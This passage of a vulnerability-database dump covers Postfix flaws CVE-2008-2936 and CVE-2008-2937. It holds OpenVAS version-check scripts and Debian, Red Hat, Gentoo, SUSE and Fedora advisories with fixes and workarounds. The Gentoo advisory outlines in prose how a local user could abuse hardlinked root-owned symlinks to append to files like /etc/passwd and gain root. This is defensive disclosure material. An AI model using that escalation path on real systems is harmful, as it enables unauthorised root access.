"AV:LOCAL/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:49:48", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-2936"], "description": "The remote host is missing an update to postfix\nannounced via advisory DSA 1629-2.", "modified": "2017-07-07T00:00:00", "published": "2008-09-04T00:00:00", "id": "OPENVAS:61435", "href": "http://plugins.openvas.org/nasl.php?oid=61435", "type": "openvas", "title": "Debian Security Advisory DSA 1629-2 (postfix)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1629_2.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 1629-2 (postfix)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Due to a version numbering problem, the Postfix update for DSA 1629 was\nnot installable on the i386 (Intel ia32) architecture. 
This update\nincreases the version number to make it installable on i386 as well.\nFor reference the original advisory text is below.\n\nSebastian Krahmer discovered that Postfix, a mail transfer agent,\nincorrectly checks the ownership of a mailbox. In some configurations,\nthis allows for appending data to arbitrary files as root.\n\nNote that only specific configurations are vulnerable; the default\nDebian installation is not affected. Only a configuration meeting\nthe following requirements is vulnerable:\n* The mail delivery style is mailbox, with the Postfix built-in\nlocal(8) or virtual(8) delivery agents.\n* The mail spool directory (/var/spool/mail) is user-writeable.\n* The user can create hardlinks pointing to root-owned symlinks\nlocated in other directories.\n\nFor a detailed treating of the issue, please refer to the upstream\nauthor's announcement:\nhttp://article.gmane.org/gmane.mail.postfix.announce/110\n\nFor the stable distribution (etch), this problem has been fixed in\nversion 2.3.8-2+etch1.\n\nFor the testing distribution (lenny), this problem has been fixed in\nversion 2.5.2-2lenny1.\n\nFor the unstable distribution (sid), this problem has been fixed\nin version 2.5.4-1.\n\nWe recommend that you upgrade your postfix package.\";\ntag_summary = \"The remote host is missing an update to postfix\nannounced via advisory DSA 1629-2.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201629-2\";\n\n\nif(description)\n{\n script_id(61435);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-04 17:00:42 +0200 (Thu, 04 Sep 2008)\");\n script_cve_id(\"CVE-2008-2936\");\n script_tag(name:\"cvss_base\", value:\"6.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 1629-2 (postfix)\");\n\n\n\n 
script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"postfix-doc\", ver:\"2.3.8-2+etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"postfix-dev\", ver:\"2.3.8-2+etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"postfix-pcre\", ver:\"2.3.8-2+etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"postfix-mysql\", ver:\"2.3.8-2+etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"postfix-cdb\", ver:\"2.3.8-2+etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"postfix\", ver:\"2.3.8-2+etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"postfix-ldap\", ver:\"2.3.8-2+etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"postfix-pgsql\", ver:\"2.3.8-2+etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.2, "vector": "AV:LOCAL/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-27T10:56:45", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-2936"], "description": "Check for the Version of postfix", "modified": 
"2017-07-12T00:00:00", "published": "2009-03-06T00:00:00", "id": "OPENVAS:870021", "href": "http://plugins.openvas.org/nasl.php?oid=870021", "type": "openvas", "title": "RedHat Update for postfix RHSA-2008:0839-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for postfix RHSA-2008:0839-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Postfix is a Mail Transport Agent (MTA), supporting LDAP, SMTP AUTH (SASL),\n and TLS.\n\n A flaw was found in the way Postfix dereferences symbolic links. If a local\n user has write access to a mail spool directory with no root mailbox, it\n may be possible for them to append arbitrary data to files that root has\n write permission to. 
(CVE-2008-2936)\n \n Red Hat would like to thank Sebastian Krahmer for responsibly disclosing\n this issue.\n \n All users of postfix should upgrade to these updated packages, which\n contain a backported patch that resolves this issue.\";\n\ntag_affected = \"postfix on Red Hat Enterprise Linux AS version 3,\n Red Hat Enterprise Linux ES version 3,\n Red Hat Enterprise Linux WS version 3,\n Red Hat Enterprise Linux AS version 4,\n Red Hat Enterprise Linux ES version 4,\n Red Hat Enterprise Linux WS version 4,\n Red Hat Enterprise Linux (v. 5 server)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2008-August/msg00015.html\");\n script_id(870021);\n script_version(\"$Revision: 6683 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-12 11:41:57 +0200 (Wed, 12 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-06 07:30:35 +0100 (Fri, 06 Mar 2009)\");\n script_tag(name:\"cvss_base\", value:\"6.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"RHSA\", value: \"2008:0839-01\");\n script_cve_id(\"CVE-2008-2936\");\n script_name( \"RedHat Update for postfix RHSA-2008:0839-01\");\n\n script_summary(\"Check for the Version of postfix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = 
get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"postfix\", rpm:\"postfix~2.3.3~2.1.el5_2\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postfix-debuginfo\", rpm:\"postfix-debuginfo~2.3.3~2.1.el5_2\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postfix-pflogsumm\", rpm:\"postfix-pflogsumm~2.3.3~2.1.el5_2\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"RHENT_4\")\n{\n\n if ((res = isrpmvuln(pkg:\"postfix\", rpm:\"postfix~2.2.10~1.2.1.el4_7\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postfix-debuginfo\", rpm:\"postfix-debuginfo~2.2.10~1.2.1.el4_7\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postfix-pflogsumm\", rpm:\"postfix-pflogsumm~2.2.10~1.2.1.el4_7\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"RHENT_3\")\n{\n\n if ((res = isrpmvuln(pkg:\"postfix\", rpm:\"postfix~2.0.16~14.1.RHEL3\", rls:\"RHENT_3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postfix-debuginfo\", rpm:\"postfix-debuginfo~2.0.16~14.1.RHEL3\", rls:\"RHENT_3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.2, "vector": "AV:LOCAL/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:11", "bulletinFamily": "unix", "cvelist": ["CVE-2008-2937", "CVE-2008-2936"], "description": "### Background\n\nPostfix is Wietse Venema's mailer that 
attempts to be fast, easy to administer, and secure, as an alternative to the widely-used Sendmail program. \n\n### Description\n\nSebastian Krahmer of SuSE has found that Postfix allows mail to be delivered to root-owned symlinks in an insecure manner under certain conditions. Normally, Postfix does not deliver mail to symlinks, except to root-owned symlinks, for compatibility with systems that use symlinks in /dev, such as Solaris. Furthermore, some systems like Linux allow a symlink to be hardlinked, while the POSIX.1-2001 standard requires that the symlink be followed. Depending on the write permissions and the delivery agent being used, this can lead to an arbitrary local file overwriting vulnerability (CVE-2008-2936). Furthermore, the Postfix delivery agent does not properly verify the ownership of a mailbox before delivering mail (CVE-2008-2937). \n\n### Impact\n\nThe combination of these features allows a local attacker to hardlink a root-owned symlink such that the newly created symlink would be root-owned and would point to a regular file (or another symlink) that would be written by the Postfix built-in local(8) or virtual(8) delivery agents, regardless of the ownership of the final destination regular file. Depending on the write permissions of the mail spool directory, the delivery style, and the existence of a root mailbox, this could allow a local attacker to append a mail to an arbitrary file like /etc/passwd in order to gain root privileges. \n\nThe default configuration of Gentoo Linux does not permit any kind of user privilege escalation. \n\nThe second vulnerability (CVE-2008-2937) allows a local attacker who already has write permission to the mail spool directory (which is not the case on Gentoo by default) to create a previously nonexistent mailbox before Postfix creates it, and so to read the mail of another user on the system. \n\n### Workaround\n\nThe following conditions must be met for a system to be vulnerable to local privilege escalation. 
\n\n * The mail delivery style is mailbox, with the Postfix built-in local(8) or virtual(8) delivery agents.\n * The mail spool directory (/var/spool/mail) is user-writeable.\n * The user can create hardlinks pointing to root-owned symlinks located in other directories.\n\nConsequently, each one of the following workarounds is effective. \n\n * Verify that your /var/spool/mail directory is not writeable by a user. Normally on Gentoo, only the mail group has write access, and no end-user should be granted the mail group ownership.\n * Prevent local users from creating hardlinks pointing outside of the /var/spool/mail directory, e.g. with a dedicated partition.\n * Use a non-builtin Postfix delivery agent, like procmail or maildrop.\n * Use the maildir delivery style of Postfix (\"home_mailbox=Maildir/\" for example).\n\nConcerning the second vulnerability, check the write permissions of /var/spool/mail, or check that every Unix account already has a mailbox, by using Wietse Venema's Perl script available in the official advisory. \n\n### Resolution\n\nAll Postfix users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=mail-mta/postfix-2.5.3-r1\"", "edition": 1, "modified": "2008-10-23T00:00:00", "published": "2008-08-14T00:00:00", "id": "GLSA-200808-12", "href": "https://security.gentoo.org/glsa/200808-12", "type": "gentoo", "title": "Postfix: Local privilege escalation vulnerability", "cvss": {"score": 6.2, "vector": "AV:LOCAL/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "suse": [{"lastseen": "2016-09-04T12:46:50", "bulletinFamily": "unix", "cvelist": ["CVE-2008-2937", "CVE-2008-2936"], "description": "Postfix is a well-known MTA. During a source code audit the SuSE Security-Team discovered a local privilege escalation bug (CVE-2008-2936) as well as a mailbox ownership problem (CVE-2008-2937) in postfix. 
The first bug allowed local users to execute arbitrary commands as root while the second one allowed local users to read other users' mail.\n#### Solution\nPlease install the updated package.", "edition": 1, "modified": "2008-08-14T14:39:29", "published": "2008-08-14T14:39:29", "id": "SUSE-SA:2008:040", "href": "http://lists.opensuse.org/opensuse-security-announce/2008-08/msg00002.html", "type": "suse", "title": "local privilege escalation in postfix", "cvss": {"score": 6.2, "vector": "AV:LOCAL/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "fedora": [{"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2008-2936", "CVE-2008-2937", "CVE-2008-3889"], "description": "Postfix is a Mail Transport Agent (MTA), supporting LDAP, SMTP AUTH (SASL), TLS ", "modified": "2008-10-09T21:31:27", "published": "2008-10-09T21:31:27", "id": "FEDORA:5F8CF208974", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 8 Update: postfix-2.5.5-1.fc8", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2008-2936", "CVE-2008-2937", "CVE-2008-3889"], "description": "Postfix is a Mail Transport Agent (MTA), supporting LDAP, SMTP AUTH (SASL), TLS ", "modified": "2008-10-09T21:33:24", "published": "2008-10-09T21:33:24", "id": "FEDORA:71804208749", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 9 Update: postfix-2.5.5-1.fc9", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}}]}